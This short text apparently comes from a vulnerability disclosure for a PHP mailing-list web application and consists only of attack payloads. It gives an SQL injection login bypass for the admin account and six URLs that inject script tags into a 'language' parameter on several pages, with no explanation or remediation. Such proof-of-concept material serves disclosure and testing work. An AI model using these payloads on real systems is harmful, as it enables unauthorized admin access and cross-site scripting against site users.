login:admin ' or 1=1/* password:whatever http://www.example.com/[path]/page/showcirculation.php?language=<script>alert(1111)</script> http://www.example.com/[path]/pages/edittemplate_step2.php?language=<script>alert(1111)</script> http://www.example.com/[path]//pages/showfields.php?language=<script>alert(1111)</script> http://www.example.com/[path]//pages/showuser.php?language=<script>alert(1111)</script> http://www.example.com/[path]//pages/editmailinglist_step1.php?language=<script>alert(222)</script> http://www.example.com/[path]//pages/showtemplates.php?language=<script>alert(1111)</script>